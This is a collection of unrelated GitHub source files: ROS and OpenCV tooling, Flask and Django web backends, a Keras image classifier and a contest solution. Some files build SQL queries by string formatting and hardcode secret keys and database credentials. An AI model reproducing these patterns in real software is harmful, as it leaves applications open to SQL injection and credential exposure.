vtanMap_x, vtanMap_y, vtanMap_z')\n\n g.node('B', '2. Compute vertex maps\\n\\n'\n '- vertexMapx_ = vertexMapxx .* vertexMapz\\n'\n '- vertexMapy_ = vertexMapyy .* vertexMapz')\n\n g.node('C', '3. Compute U-tan and V-tan\\n\\n'\n '- Calculate differences for utanMap_*\\n'\n '- Calculate differences for vtanMap_*')\n\n g.node('D', '4. Compute and normalize normal vectors\\n\\n'\n '- Calculate normalsEig_* using cross product\\n'\n '- Normalize normalsEig_* vectors')\n\n g.node('E', '5. Convert normal vectors to OpenCV format\\n\\n'\n '- Convert Eigen matrices to cv::Mat\\n'\n '- Merge channels into _normalsCV')\n\n g.node('F', '6. Blur normal map\\n\\n'\n '- cv::blur(_normalsCV, _normalsCV, cv::Size(_cellSize, _cellSize))\\n'\n '- Split channels back into separate cv::Mats')\n\n g.node('G', '7. Normalize normal vectors again\\n\\n'\n '- Convert cv::Mat back to Eigen matrices\\n'\n '- Normalize normalsEig_* vectors')\n\n g.node('H', '8. Store final normal map\\n\\n'\n '- Convert Eigen matrices to cv::Mat\\n'\n '- Merge channels into _normalsCV')\n\n g.edges(['AB', 'BC', 'CD', 'DE', 'EF', 'FG', 'GH'])\n\n g.view()\nelif 1:\n dot = Digraph(\"Callback Function Flowchart\", format=\"png\")\n\n dot.node(\"A\", \"1. 开始\")\n dot.node(\"B\", \"2. 计时并输出处理第n帧信息\\nnth_frame\")\n dot.node(\"C\", \"3. 更新ros_header并计算时间差\\ntime_diff\")\n dot.node(\"D\", \"4. 尝试将深度图像从ROS消息转换为OpenCV矩阵\\ncv_bridge::toCvShare\")\n dot.node(\"E\", \"5. 进行类型转换(如果需要)\\nimD.convertTo\")\n dot.node(\"F\", \"6. 调整图像尺寸\\ncv::resize\")\n dot.node(\"G\", \"7. 检查是否初始化\\ninitialized\")\n dot.node(\"H1\", \"8.1 计算法线图\\nEfficientDepth2NormalMap\")\n dot.node(\"H2\", \"8.2 初始化rotation_rel和rotation_key\")\n dot.node(\"I1\", \"9.1 计算法线图\\nEfficientDepth2NormalMap\")\n dot.node(\"I2\", \"9.2 初始化AnglesMap\")\n dot.node(\"I3\", \"9.3 计算旋转矩阵\\nEfficientNormal2RotationMat\")\n dot.node(\"I4\", \"9.4 更新rotation_rel\")\n dot.node(\"J\", \"10. 检查是否初始化\\ninitialized\")\n dot.node(\"K\", \"11. 重新投影点云\\nreproject\")\n dot.node(\"L\", \"12. 获取响应\\nget_response\")\n dot.node(\"M\", \"13. 计算PSR\\nget_psr\")\n dot.node(\"N\", \"14. 
优化关键点云位姿\\nrefine_keyclouds_poses\")\n dot.node(\"O\", \"15. 发布位姿\\npublish_poses\")\n dot.node(\"P\", \"16. 发布twist(如果需要)\\npublish_twists\")\n dot.node(\"Q\", \"17. 发布增量关键帧协方差(如果需要)\\npublish_incremental_keypose_cov\")\n dot.node(\"R\", \"18. 检查PSR、有效点数和旋转角度\\npsr, valid_points\")\n dot.node(\"S\", \"19. 输出分辨率、计时信息和PSR\\nresolution, time_use, psr\")\n dot.node(\"T\", \"20. 显示可视化结果(如果需要)\\nshow\")\n dot.node(\"U\", \"21. 增加帧数\\nnth_frame++\")\n dot.node(\"V\", \"22. 结束\")\n\n dot.edges([(\"A\", \"B\"), (\"B\", \"C\"), (\"C\", \"D\"), (\"D\", \"E\"), (\"E\", \"F\"), (\"F\", \"G\"), (\"G\", \"H1\"), (\"H1\", \"H2\"), (\"G\", \"I1\"), (\"I1\", \"I2\"), (\"I2\", \"I3\"), (\"I3\", \"I4\"), (\"I4\", \"J\"), (\"J\", \"K\"), (\"K\", \"L\"), (\"L\", \"M\"), (\"M\", \"N\"), (\"N\", \"O\"), (\"O\", \"P\"), (\"P\", \"Q\"), (\"Q\", \"R\"), (\"R\", \"S\"), (\"S\", \"T\"), (\"T\", \"U\"), (\"U\", \"V\")])\n dot.view()\n\n","repo_name":"yangzheng-yz/ni-rgbd-slam","sub_path":"src/ni_slam/script/show_flowchart.py","file_name":"show_flowchart.py","file_ext":"py","file_size_in_byte":3780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"71673122679","text":"# coding=utf-8\n__author__ = 'smallfly'\n\nfrom flask_restful import Resource\nfrom flask_restful.reqparse import RequestParser\nfrom app.mod_interaction.database_operations import common\nfrom app.mod_interaction import models\nfrom app import db\nimport random\n\nNUMBERS = [str(i) for i in range(10)]\n\ndef generate_collection_id(length=6):\n collection_id = \"\"\n for i in range(length):\n collection_id += random.choice(NUMBERS)\n return collection_id\n\ndef check_existence(collection_id):\n collector = common.query_single_by_filed(models.Collector, \"collection_id\", collection_id)\n if collector is None:\n return False\n return True\n\n\nclass CollectorResource(Resource):\n \"\"\"\n 用于申请课表收集的API\n \"\"\"\n\n POST_PARSER = RequestParser(trim=True)\n GET_PARSER = RequestParser(trim=True)\n\n def get(self):\n self.GET_PARSER.add_argument(\"username\", required=True, location=\"headers\")\n self.GET_PARSER.add_argument(\"token\", required=True, location=\"headers\")\n\n args = self.GET_PARSER.parse_args()\n user = common.query_single_by_filed(models.User, \"account\", args[\"username\"])\n if user is None:\n return {\"error\": \"user doesn't exist\"}, 404\n token_check = {\n \"uid\": user.id,\n \"token\": args[\"token\"]\n }\n if not common.check_token(token_check):\n return {\"error\": \"token is wrong\"}, 401\n\n collectors = models.Collector.query.filter_by(uid=user.id).all()\n result = []\n for collector in collectors:\n count = models.SyllabusCollection.query.with_entities(models.SyllabusCollection.collection_id).filter_by(collection_id=collector.collection_id).count()\n result.append(\n {\n \"collection_id\": collector.collection_id,\n \"start_year\": collector.start_year,\n \"season\": collector.season,\n \"count\": count\n }\n )\n # collectors = [ dict(collection_id=x.collection_id, start_year=x.start_year, season=x.season) for x in collectors ]\n\n return {\"collection_ids\": result}\n\n def post(self):\n \"\"\"\n 请求地址: /interaction/api/v2/collector\n 参数:\n 必选参数:\n 位置: form\n username 用户账号\n token 用户验证令牌\n start_year 学年的开始年份\n season 春夏秋指定一个, 同学分制\n :return:\n \"\"\"\n self.POST_PARSER.add_argument(\"username\", required=True, location=\"form\")\n self.POST_PARSER.add_argument(\"token\", required=True, location=\"form\")\n self.POST_PARSER.add_argument(\"start_year\", type=int, 
required=True, location=\"form\")\n self.POST_PARSER.add_argument(\"season\", type=int, required=True, location=\"form\")\n\n args = self.POST_PARSER.parse_args()\n user = common.query_single_by_filed(models.User, \"account\", args[\"username\"])\n if user is None:\n return {\"error\": \"user doesn't exist\"}, 404\n token_check = {\n \"uid\": user.id,\n \"token\": args[\"token\"]\n }\n if not common.check_token(token_check):\n return {\"error\": \"token is wrong\"}, 401\n\n while True:\n collection_id = generate_collection_id()\n if not check_existence(collection_id):\n break\n\n collector = models.Collector(collection_id=collection_id, start_year=args[\"start_year\"], season=args[\"season\"], uid=user.id)\n result = common.add_to_db(db, collector)\n if result == True:\n return {\"collection_id\": collector.collection_id}\n else:\n return {\"error\": \"commit error in mysql\"}, 500\n\n\n\n","repo_name":"xiaofud/syllabus_backend","sub_path":"app/mod_interaction/resources/CollectorResource.py","file_name":"CollectorResource.py","file_ext":"py","file_size_in_byte":3779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"5523480226","text":"#!/usr/bin/env python\nimport roslib; roslib.load_manifest('unity_slam')\nimport rospy\nimport tf\nimport tf.msg\nimport geometry_msgs.msg\nimport unity_slam.msg\nimport math\n\nPREFIX = 'freight/'\n\nclass Mover:\n def mover_callback(self, data):\n #t = geometry_msgs.msg.TransformStamped()\n #t.header.frame_id = \"{}base_link\".format(PREFIX)\n #t.header.stamp = rospy.Time.now()\n #t.child_frame_id = \"{}chassis_link\".format(PREFIX)\n #t.transform.translation.x = data.pos_x\n #t.transform.translation.y = data.pos_y\n #t.transform.translation.z = data.pos_z\n\n #t.transform.rotation.x = data.rot_x\n #t.transform.rotation.y = data.rot_y\n #t.transform.rotation.z = data.rot_z\n #t.transform.rotation.w = data.rot_w\n\n #tfm = tf.msg.tfMessage([t])\n br = tf.TransformBroadcaster()\n br.sendTransform((data.pos_x, data.pos_y, data.pos_z),\n (data.rot_x, data.rot_y, data.rot_z, data.rot_w),\n rospy.Time.now(),\n \"freight/chassis_link\",\n \"freight/base_link\")\n ## self.pub_tf.publish(tfm)\n print(data)\n\n def __init__(self):\n ## self.pub_tf = rospy.Publisher(\"/tf\", tf.msg.tfMessage, queue_size = 2)\n self.pub_pr = rospy.Publisher(\"/pr\", unity_slam.msg.PosRot, queue_size = 2)\n\n rospy.Subscriber('pr', unity_slam.msg.PosRot, self.mover_callback)\n\n rospy.spin()\n\n\n\nif __name__ == '__main__':\n rospy.init_node('random_tf_broadcaster')\n mover = Mover()\n\n\n","repo_name":"rmanky/catkin_ws","sub_path":"src/gopher_unity/scripts/random_tf_broadcaster.py","file_name":"random_tf_broadcaster.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7817469192","text":"from fafscripts.modules import notion_new as n, utils as u\nfrom fafscripts.models import FilmProgramme\nfrom docx import Document\nfrom random import randrange\nimport logging\n\n\ndef main(programme, seq, norwegian_mode):\n\n logger = logging.getLogger(__name__)\n\n dropbox_folder = u.get_secret(\"DROPBOX_FOLDER\")\n\n# retrieving a filtered and sorted film db\n programme_id = FilmProgramme.query.filter_by(\n name=programme).first().notion_id\n data_dict = dict()\n n.add_filter_to_request_dict(data_dict, '🎥 Film programmes', 'relation',\n 'contains', programme_id)\n n.add_sorts_to_request_dict(data_dict, seq)\n# 
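(presumably an earlier hard-coded sort, kept for reference) 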
n.add_sorts_to_request_dict(data_dict, 'Seq', 'ascending') # sort by sequence (if exists)\n data_source = n.get_db('films', data_dict=data_dict)\n\n doc = Document()\n\n doc.add_paragraph(programme)\n\n for i, film_json in enumerate(data_source['results']):\n # NB: make sure property names and types match those from database\n f = n.Page(json_obj=film_json)\n countries = f.get_list('country')\n if norwegian_mode:\n countries = [u.english_country_to_norwegian(\n country) for country in countries]\n\n film_data = {\n \"title\": f.get_text('english-title'),\n # \"title_ov\": n.get_property(i, \"Original Title\", 'rich_text', source=data_source),\n # \"year\": n.get_property(i, \"Year\", 'select', source=data_source),\n \"director\": f.get_text('director'),\n # \"synopsis\": n.get_property(i, \"Synopsis\", 'rich_text', source=data_source),\n # \"bio\": n.get_property(i, \"Bio\", 'rich_text', source=data_source),\n \"country\": u.list_to_comma_separated(countries),\n # \"runtime\": n.get_property(i, \"Runtime\", 'rich_text', source=data_source), # OBS\n # \"technique\": u.list_to_comma_separated(n.get_property(i, \"Technique\", 'multi_select', source=data_source)),\n # \"production\": n.get_property(i, \"Production\", 'rich_text', source=data_source),\n # \"animation\": n.get_property(i, \"Animation\", 'rich_text', source=data_source),\n # \"seq\": str(i + 2).zfill(2), # OBS\n }\n\n # composing and adding a single line for each film in word document\n p = doc.add_paragraph()\n\n run = p.add_run(film_data.get('title'))\n run.italic = True\n\n run = p.add_run(f\" – {film_data['director']} – {film_data['country']}\")\n run.italic = False\n\n rand = randrange(1000)\n doc.save(f'temp{rand}.docx')\n logger.info('List written.')\n\n if norwegian_mode:\n u.dropbox_upload_local_file(\n f'temp{rand}.docx', f\"{dropbox_folder}/film_lists/{programme}_norsk.docx\")\n else:\n u.dropbox_upload_local_file(\n f'temp{rand}.docx', f\"{dropbox_folder}/film_lists/{programme}.docx\")\n","repo_name":"jsaabel/FilmFestivalHelpers-fafscripts","sub_path":"fafscripts/scripts/film_list_export_script.py","file_name":"film_list_export_script.py","file_ext":"py","file_size_in_byte":2869,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"}
+{"seq_id":"70629770680","text":"# -*- coding:utf-8 -*-\n# Shopping cart: a temporary data-collection structure\n\nfrom decimal import Decimal\nfrom django.conf import settings\n\nfrom shop.models import Product\nfrom coupons.models import Coupon\n\n\nclass Cart(object):\n\n def __init__(self, request):\n self.session = request.session\n cart = self.session.get(settings.CART_SESSION_ID)\n if not cart:\n cart = self.session[settings.CART_SESSION_ID] = {}\n self.cart = cart\n self.coupon_id = self.session.get('coupon_id')\n\n @property\n def coupon(self):\n if self.coupon_id:\n return Coupon.objects.get(id=self.coupon_id)\n return None\n\n def get_discount(self):\n if self.coupon:\n return (self.coupon.discount / Decimal('100')) \\\n * self.get_total_price()\n return Decimal('0')\n\n def get_total_price_after_discount(self):\n return self.get_total_price() - self.get_discount()\n\n def add(self, product, quantity=1, update_quantity=False):\n product_id = str(product.id)\n if product_id not in self.cart:\n self.cart[product_id] = {\n 'quantity': 0,\n 'price': str(product.price) # necessary?\n }\n if update_quantity:\n self.cart[product_id]['quantity'] = quantity\n else:\n self.cart[product_id]['quantity'] += quantity\n self.save()\n\n def save(self):\n self.session.modified = True\n\n 
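The cart record above stores each price as str(product.price) and only turns it back into Decimal when iterating, which is the pattern its "# necessary?" comment asks about. A minimal sketch of why, assuming only that Django sessions are JSON-serialized (the names below are illustrative, not from the record):

import json
from decimal import Decimal

# Decimal is not JSON-serializable, so a session-bound cart keeps prices as str
item = {'quantity': 2, 'price': str(Decimal('19.99'))}
restored = json.loads(json.dumps(item))   # stands in for a session round trip
total = Decimal(restored['price']) * restored['quantity']
print(total)  # Decimal('39.98')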
def remove(self, product):\n product_id = str(product.id)\n if product_id in self.cart:\n del self.cart[product_id]\n self.save()\n\n def __iter__(self):\n product_ids = self.cart.keys()\n products = Product.objects.filter(id__in=product_ids)\n\n cart = self.cart.copy()\n for product in products:\n cart[str(product.id)]['product'] = product\n\n for item in cart.values():\n item['price'] = Decimal(item['price'])\n item['total_price'] = item['price'] * item['quantity']\n yield item\n\n def __len__(self):\n return sum(item['quantity'] for item in self.cart.values())\n\n def get_total_price(self):\n return sum(Decimal(item['price']) * item['quantity']\n for item in self.cart.values())\n\n def clear(self):\n del self.session[settings.CART_SESSION_ID]\n self.save()\n","repo_name":"ch1huizong/dj","sub_path":"onlineshop/myshop/cart/cart.py","file_name":"cart.py","file_ext":"py","file_size_in_byte":2381,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"40"} +{"seq_id":"13182276072","text":"\"\"\"Main Serverr for MHH page/app\n\"\"\"\n\n\nfrom flask import Flask, redirect, request, flash, render_template, jsonify, session\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom jinja2 import StrictUndefined\nfrom model import connect_to_db, db, User, Project, Inventory\n\napp = Flask(__name__)\n# Required to use Flask sessions and the debug toolbar\n\napp.secret_key = \"ProtectTheHoard\"\n\n# This option will cause Jinja to throw UndefinedErrors if a value hasn't\n# been defined (so it more closely mimics Python's behavior)\napp.jinja_env.undefined = StrictUndefined\n\n# This option will cause Jinja to automatically reload templates if they've been\n# changed. This is a resource-intensive operation though, so it should only be\n# set while debugging.\napp.jinja_env.auto_reload = True\n\n# Required to use Flask sessions and the debug toolbar\n#app.secret_key = 'ABC'\n\n\n\n\n@app.route('/')\ndef index():\n \"\"\"Show our index page.\"\"\"\n\n # check to see if user is logged in\n # user_id = session['user_id']\n\n # if user_id is None:\n # return render_template('index.html')\n\n # else:\n # return redirect(f'/user/{user_id}')\n\n # if not display the index page\n\n # if there is a user_id in session\n # display the user profile page?\n\n return render_template('index.html')\n\n@app.route('/index')\ndef index2():\n \"\"\"Show our index page.\"\"\"\n user_id = session['user_id']\n # check to see if user is logged in\n\n\n # if not display the index page\n\n # if there is a user_id in session\n # display the user profile page?\n return render_template('index.html')\n\n@app.route('/login_form')\ndef login_form():\n \"\"\"Bring the User to the login webpage.\"\"\"\n\n return render_template('login_form.html')\n\n\n@app.route('/login', methods=['POST'])\ndef login():\n\n #check to see if user_id is in session\n\n\n \"\"\"Validate email and password and update session.\"\"\"\n\n user_email = request.form.get('email')\n user_password = request.form.get('password')\n\n \n\n user = User.query.filter_by(email=request.form.get('email')).first()\n \n if user.login(request.form.get('password')):\n app.logger.info('Login successful ...')\n session['user_id'] = user.user_id\n flash('Login successful.')\n return redirect(f'/user/{ user.user_id }')\n else:\n app.logger.info('Login failed!')\n return redirect('/login_form')\n\n \n\n\n@app.route(\"/logout\")\ndef process_logout():\n \"\"\"Log user out.\"\"\"\n\n del session[\"user_id\"]\n flash(\"Logged out.\")\n return 
redirect(\"/\")\n\n\n@app.route(\"/register\")\ndef register():\n \"\"\"Display the form for user to fill out and register for an account.\"\"\"\n return render_template('register.html')\n\n\n@app.route(\"/new_user\", methods=['POST'])\ndef new_user():\n \"\"\"Take the information from the register form and insert this User into \n the database\"\"\"\n email = request.form[\"email\"]\n password = request.form[\"password\"]\n fname = request.form[\"fname\"]\n lname= request.form[\"lname\"]\n username = request.form[\"username\"]\n\n new_user = User(username=username,\n email=email,\n password=password,\n fname=fname,\n lname=lname)\n\n \n #hashing password before storing it\n new_user.create_hashedpw(password)\n\n new_user.save()\n\n # db.session.add(new_user)\n # db.session.commit()\n\n flash(f\"User {email} added.\")\n return redirect(\"/\")\n\n\n@app.route('/user/<user_id>')\ndef user_info(user_id):\n \"\"\"Display user info.\"\"\"\n \n user = User.query.get(user_id)\n inventory = user.inventory\n projects = user.projects\n\n return render_template('user_profile.html', user=user, inventory=inventory,\n projects=projects)\n\n\n@app.route('/user')\ndef user():\n \"\"\" NOTE TO SELF - do I NEED two routes???\"\"\"\n user_id = session['user_id']\n user = User.query.get(user_id)\n\n return redirect(f'/user/{user_id}')\n\n\n@app.route('/add_inv', methods=['POST'])\ndef create_inv():\n \"\"\" Display the form for the user to enter the required info for an \n inventory item \"\"\"\n\n # get the user info saved in session\n user_id = session['user_id']\n\n #get the info from the form\n inv_name = request.form['inv_name']\n inv_type = request.form['inv_type']\n description = request.form['description']\n price = request.form['price']\n count_per_package = request.form['count_per_package']\n manufacturer = request.form['manufacturer']\n size = request.form['size']\n\n # Not using picture path yet - just initializing it as a blank\n picture_path=\"\"\n # do we need to process keywords into a python list?\n keywords = request.form['keywords']\n\n \n #create the inv item\n new_inv = Inventory(user_id=user_id,\n inv_name=inv_name,\n inv_type=inv_type,\n description=description,\n price=price,\n count_per_package=count_per_package,\n manufacturer=manufacturer,\n size=size,\n picture_path=picture_path,\n keywords=keywords)\n\n \n\n \n\n #add to session & commit\n # db.session.add(new_inv)\n # db.session.commit()\n new_inf.save()\n\n flash(f\"Inventory Item: {inv_name} added.\")\n\n return redirect('/inventory')\n\n\n@app.route('/add_inv_form')\ndef add_inv_form():\n \"\"\" Add a new inventory item \"\"\"\n return render_template('inv_form.html')\n\n@app.route('/view_inv_item/<int:inv_id>')\ndef get_inv_item(inv_id):\n \"\"\"View an individual inv_item\"\"\"\n\n # get the user info saved in session\n user_id = session['user_id']\n\n #the inv_id was passed in with the route path\n # we can use it to query the db and get an individual inventory\n # item from the inventory table.\n inv_item = Inventory.query.get(inv_id)\n \n #return that info to be displayed on the view_inv_item.html page\n\n return render_template(\"view_inv_item.html\", inv_item=inv_item)\n\n@app.route('/inventory')\ndef view_inventory():\n \"\"\" View all the inventory for a particular user\"\"\"\n\n user_id = session['user_id']\n user = User.query.get(user_id)\n\n inventory = user.inventory\n #get the tools for this user in the inventory table\n # utools_query = db.session.query(inventory).filter_by(inv_type='t').all()\n # 
usupplies_query = db.session.query(inventory).filter_by(inv_type='s').all()\n\n \n return render_template('inventory.html', user=user, inventory=inventory)\n\n@app.route('/add_proj_form')\ndef add_proj_form():\n return render_template('proj_form.html')\n\n\n@app.route('/add_project', methods=['POST'])\ndef add_project():\n \"\"\" Add a new project \"\"\"\n user_id = session['user_id']\n name = request.form['proj_name']\n status = request.form['status']\n description = request.form['description']\n picture_path = \"\"\n keywords = request.form['keywords']\n tool_list = request.form['tool_list']\n supply_list = request.form['supply_list']\n directions = request.form['directions']\n URL_link = request.form['URL_link']\n\n app.logger.info(\"getting project data from form\")\n new_proj = Project(user_id=user_id,\n status=status,\n name=name,\n description=description,\n picture_path=picture_path,\n keywords=keywords,\n tool_list=tool_list,\n supply_list=supply_list,\n directions=directions,\n URL_link=URL_link)\n\n #add to session & commit\n # db.session.add(new_proj)\n # db.session.commit()\n new_proj.save()\n\n flash(f\"Project: {name} added.\")\n\n return redirect('/projects')\n\n\n@app.route('/projects')\ndef view_projects():\n user_id = session['user_id']\n user = User.query.get(user_id)\n projects = user.projects\n \n \"\"\" Show all the projects for a particular user\"\"\"\n return render_template('projects.html',user=user, projects=projects)\n\n@app.route('/view_proj_item/<int:project_id>')\ndef get_proj_item(project_id):\n \"\"\"View an individual inv_item\"\"\"\n\n # get the user info saved in session\n user_id = session['user_id']\n\n #the inv_id was passed in with the route path\n # we can use it to query the db and get an individual inventory\n # item from the inventory table.\n proj_item = Project.query.get(project_id)\n \n #return that info to be displayed on the view_inv_item.html page\n\n return render_template(\"view_proj_item.html\", proj_item=proj_item)\n\n@app.route('/search')\ndef search():\n \"\"\" Search for specific tools/supplies, and View all of the tools \n and supplies saved in the database- for the user that is logged in \"\"\"\n return render_template('search.html')\n\n# @app.route('/user')\n# def user_profile():\n# \"\"\" Show the profile information of the person logged in\"\"\"\n# return render_template('user_profile.html')\n\n\n\nif __name__ == \"__main__\":\n\n # We have to set debug=True here, since it has to be True at the\n # point that we invoke the DebugToolbarExtension\n app.debug = True\n app.config[\"DEBUG_TB_INTERCEPT_REDIRECTS\"] = False\n\n # make sure templates, etc. 
are not cached in debug mode\n app.jinja_env.auto_reload = app.debug\n\n connect_to_db(app)\n\n # Use the DebugToolbar\n DebugToolbarExtension(app)\n\n app.run(debug=True, port=5000, host=\"0.0.0.0\")","repo_name":"student-code-reviews/ManageMyHoard","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":9469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"19932728848","text":"# Importing libraries\nimport numpy as np\n\nimport re\n\nimport spacy\nimport es_core_news_sm\n\nimport nltk\nfrom nltk.sentiment.vader import SentimentIntensityAnalyzer\n\n##### FUNCTION #####\n\ndef sentiment_analysis_reviews (reviews_df):\n\n '''\n Function that analyses the sentiment of each IMDB audience review by using the \n Sentiment Intensity Analyzer from the NLTK library.\n\n :args:\n reviews_df: a dataframe with all the reviews.\n\n :return:\n the same dataframe but with 4 new columns: pos, neg, neu and compound.\n \n '''\n \n sia = SentimentIntensityAnalyzer()\n \n positive = []\n negative = []\n neutral = []\n compound = []\n \n for row in reviews_df['Review']:\n\n try:\n positive.append(sia.polarity_scores(row)['pos'])\n negative.append(sia.polarity_scores(row)['neg'])\n neutral.append(sia.polarity_scores(row)['neu'])\n compound.append(sia.polarity_scores(row)['compound'])\n\n except:\n positive.append(np.nan)\n negative.append(np.nan)\n neutral.append(np.nan)\n compound.append(np.nan)\n\n reviews_df['positive sentiment'] = positive\n reviews_df['negative sentiment'] = negative\n reviews_df['neutral sentiment'] = neutral\n reviews_df['compound sentiment'] = compound\n \n return reviews_df\n\n##################################\n\n ","repo_name":"Maya-Souza/SQL-Database-and-Sentiment-Analysis-Before-Sunrise-Trilogy","sub_path":"data_manipulation/sentiment_analysis.py","file_name":"sentiment_analysis.py","file_ext":"py","file_size_in_byte":1397,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"28643922632","text":"# I got an error on my system when I try to train this neural net\n# `Error #15: Initializing libiomp5.dylib, but found libomp.dylib already initialized`\n# Solution: https://stackoverflow.com/questions/53014306/error-15-initializing-libiomp5-dylib-but-found-libiomp5-dylib-already-initial\nimport os\n\nos.environ['KMP_DUPLICATE_LIB_OK'] = 'True'\n\nfrom tensorflow import keras\nfrom tensorflow.keras import layers\nfrom tensorflow.keras.preprocessing.image import ImageDataGenerator\nimport matplotlib.pyplot as plt\n\ndatagen = ImageDataGenerator(rotation_range=40,\n width_shift_range=0.2,\n height_shift_range=0.2,\n shear_range=0.2,\n zoom_range=0.2,\n fill_mode='nearest')\n\ntrain_it = datagen.flow_from_directory('data/weather/train/',\n target_size=(128, 128),\n color_mode='rgb',\n class_mode='categorical',\n batch_size=16)\nvalid_it = datagen.flow_from_directory('data/weather/validation/',\n target_size=(128, 128),\n color_mode='rgb',\n class_mode='categorical',\n batch_size=16)\n\nmodel = keras.Sequential()\nmodel.add(layers.Conv2D(32, (3, 3), activation='relu', input_shape=(128, 128, 3)))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu'))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(64, (3, 3), activation='relu'))\nmodel.add(layers.MaxPooling2D((2, 2)))\nmodel.add(layers.Conv2D(64, (5, 5), activation='relu'))\nmodel.add(layers.Flatten())\nmodel.add(layers.Dense(32, 
activation='relu'))\nmodel.add(layers.Dense(4))\nmodel.summary()\n\nmodel.compile(optimizer='adam',\n loss=keras.losses.CategoricalCrossentropy(from_logits=True),\n metrics=['accuracy'])\n\nhistory = model.fit(train_it,\n steps_per_epoch=len(train_it),\n validation_data=valid_it,\n validation_steps=len(valid_it),\n epochs=50,\n callbacks=[keras.callbacks.EarlyStopping(patience=10)])\n\nplt.plot(history.history['accuracy'])\nplt.plot(history.history['val_accuracy'])\nplt.title('Model Performance')\nplt.ylabel('accuracy')\nplt.xlabel('epoch')\nplt.legend(['train', 'val'], loc='upper left')\nplt.show()\n","repo_name":"mrtkp9993/DeepLearningExamples","sub_path":"codes/02_CNN_Img_Classification.py","file_name":"02_CNN_Img_Classification.py","file_ext":"py","file_size_in_byte":2570,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"40"}
+{"seq_id":"44588141740","text":"def main():\n # Get number of test cases\n test_cases = int(input())\n for test_case in range(1, test_cases + 1):\n _ = input(\"\")\n lis = [int(i) for i in input(\"\").split(\" \")]\n list_len = len(lis)\n already = set()\n count = 0\n out = 0\n for i in range(list_len-1,-1,-1):\n already.add(lis[i])\n count+=1\n if(len(already) != count):\n out = list_len-(count-1)\n break\n print(out)\nif __name__ == \"__main__\":\n main()","repo_name":"Protype8/PythonCompetitionCodes","sub_path":"codeforces/Remove Prefix.py","file_name":"Remove Prefix.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"}
+{"seq_id":"21293416931","text":"import mysql.connector\nimport yaml\nimport os\n\n# file=open(\"config.yaml\",'r')\nwith open(os.path.dirname(__file__)+\"/config.yaml\",'r') as stream:\n try:\n # pyaml.load(stream))\n # yaml.load() requires an explicit Loader on PyYAML >= 6\n data = yaml.load(stream, Loader=yaml.SafeLoader)\n # print(dat['password'])\n except yaml.YAMLError as exc:\n print(exc)\n\n\n\n\n\ndef getMySQLconnection():\n # This is the local DB on my PC. 
Dont get any funny ideas regarding it.\n cnx = mysql.connector.connect(user=data['mysqluser'], password=data['mysqlpassword'],\n host=data['mysqlserver'], database=data['mysqldb'], )\n\n return cnx\n\ndef getAnnotationType(s):\n\n try:\n cnx= getMySQLconnection()\n crsr = cnx.cursor()\n query = (\"select AnnotationTypeID from annotation_type where AnnotationName=\\'{}\\' limit 1\".format(s))\n crsr.execute(query)\n\n i= int(crsr.fetchone()[0])\n crsr.close()\n cnx.close()\n return i\n except Exception as ex:\n return ex\n\n\n\n\n\ndef getEvidenceTypeID(s):\n\n try:\n cnx= getMySQLconnection()\n crsr = cnx.cursor()\n query = (\"select EvTypeID from evidence_type where EvName=\\'{}\\' limit 1\".format(s))\n crsr.execute(query)\n\n i= int(crsr.fetchone()[0])\n crsr.close()\n cnx.close()\n return i\n except Exception:\n return 0\n\n\n\ndef getMutationTypeID(s):\n\n try:\n cnx= getMySQLconnection()\n crsr = cnx.cursor()\n query = (\"select MutTypeID from mutation_type where MutName=\\'{}\\' limit 1\".format(s))\n crsr.execute(query)\n\n i= int(crsr.fetchone()[0])\n crsr.close()\n cnx.close()\n return i\n except Exception:\n return 0\n\n# print getMutationTypeID('SNP')","repo_name":"Sahilshetye/Breseq-Hansel-Porter","sub_path":"Hansel_HTMLscrapper/MySqlConnector.py","file_name":"MySqlConnector.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"7531462861","text":"from flask import Flask, request, g, jsonify\nfrom flask_cors import CORS\nfrom flask_sqlalchemy import SQLAlchemy\nfrom sqlalchemy import create_engine\nfrom datetime import datetime, timedelta\nimport jwt\n\napp = Flask(__name__)\ndbURL = 'mysql://tt:admin@localhost/ecommerce'\napp.config['SQLALCHEMY_DATABASE_URI'] = dbURL\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\ndb = SQLAlchemy(app)\nCORS(app)\napp.config['SECRET_KEY'] = 'GjIhOUzLBVs5CJ09j04KWg'\n\n\nclass Category(db.Model):\n __tablename__ = 'category'\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.String(255), unique=True, nullable=False)\n description = db.Column(db.Text, nullable=False)\n image = db.Column(db.Text, nullable=False)\n\n def as_dict(self):\n return {col.name: getattr(self, col.name) for col in self.__table__.columns}\n\n\nclass Customer(db.Model):\n __tablename__ = 'customer'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n username = db.Column(db.String, nullable=False)\n password = db.Column(db.String, nullable=False)\n first_name = db.Column(db.String, nullable=False)\n last_name = db.Column(db.String, nullable=False)\n postal_code = db.Column(db.String, nullable=False)\n gender = db.Column(db.String, nullable=False)\n created_at = db.Column(db.Date, server_default=db.func.now())\n\n def as_dict(self):\n return {col.name: getattr(self, col.name) for col in self.__table__.columns}\n\n\nclass Order(db.Model):\n __tablename__ = 'order'\n id = db.Column(db.Integer, 